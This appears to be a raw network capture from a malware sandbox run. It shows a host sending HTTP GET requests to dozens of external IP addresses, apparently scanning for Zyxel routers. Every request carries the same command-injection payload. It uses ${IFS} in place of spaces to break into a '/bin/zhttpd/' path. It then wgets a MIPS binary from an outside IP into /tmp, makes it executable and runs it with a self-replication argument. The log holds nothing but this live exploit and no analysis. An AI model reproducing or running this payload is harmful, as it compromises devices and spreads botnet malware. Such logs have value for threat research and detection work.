                                                        Jan 28, 2024 10:13:01.577999115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6582192.168.2.145397473.127.164.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578039885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6583192.168.2.143954095.184.40.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578072071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6584192.168.2.1437104168.196.106.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578103065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6585192.168.2.1439390134.120.199.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578154087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6586192.168.2.1455402167.29.197.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578183889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6587192.168.2.1451642147.211.9.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578228951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6588192.168.2.1460874213.88.162.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578249931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6589192.168.2.1447162128.192.178.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578305960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6590192.168.2.146095876.17.115.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578341961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6591192.168.2.1434980186.133.220.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578394890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6592192.168.2.1438106131.87.239.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578423023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6593192.168.2.144170882.110.123.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578453064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6594192.168.2.144520618.223.190.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578495979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6595192.168.2.1454090191.239.85.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578527927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6596192.168.2.1442832205.180.105.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578588963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6597192.168.2.1444802147.71.209.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578613043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6598192.168.2.1437062123.227.150.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578656912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6599192.168.2.1434496193.163.51.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578685999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6600192.168.2.1458808212.25.82.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578725100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6601192.168.2.144218818.221.122.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578761101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6602192.168.2.1442574189.151.148.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578807116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6603192.168.2.14559281.99.60.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578840017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6604192.168.2.144734820.41.9.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578902960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6605192.168.2.1442548115.61.10.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578922987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6606192.168.2.145181076.78.243.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.578960896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6607192.168.2.1450200111.154.227.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579008102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6608192.168.2.1454706101.37.237.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579049110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6609192.168.2.1450442184.100.35.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579086065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6610192.168.2.1441000156.35.102.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579111099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6611192.168.2.1445398150.58.103.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579143047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6612192.168.2.144316894.33.64.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579200983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6613192.168.2.1455190163.39.113.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579237938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6614192.168.2.143540096.154.63.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579282045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6615192.168.2.1447024165.97.107.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579320908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6616192.168.2.1453600164.19.35.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579360008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6617192.168.2.144035888.126.161.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579394102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6618192.168.2.143455459.176.181.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579427958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6619192.168.2.1454046132.76.72.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579444885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6620192.168.2.1434146107.31.177.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579490900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6621192.168.2.145560842.23.235.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579519033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6622192.168.2.1444606223.248.148.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579569101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6623192.168.2.1446590154.223.95.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579597950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6624192.168.2.1441696138.139.212.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579639912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6625192.168.2.144312446.245.245.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579674006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6626192.168.2.1455056107.210.205.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579711914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6627192.168.2.1458856182.140.91.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579751968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6628192.168.2.1434922207.65.111.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579781055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6629192.168.2.1444186211.102.62.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579822063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6630192.168.2.1453002144.8.31.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579859972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6631192.168.2.14598684.179.108.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579898119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6632192.168.2.1438584199.155.150.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579933882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6633192.168.2.146071883.41.38.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.579966068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6634192.168.2.1443254149.36.172.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580019951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6635192.168.2.1434942155.171.253.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580044031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6636192.168.2.1438472184.183.152.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580063105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6637192.168.2.1453966217.46.1.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580101013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6638192.168.2.1455596160.173.11.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580137014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6639192.168.2.1434210183.219.201.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580190897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6640192.168.2.145403057.26.82.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580210924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6641192.168.2.144504446.90.104.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580241919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6642192.168.2.1440118131.95.106.241443
                                                        TimestampBytes transferredDirectionData
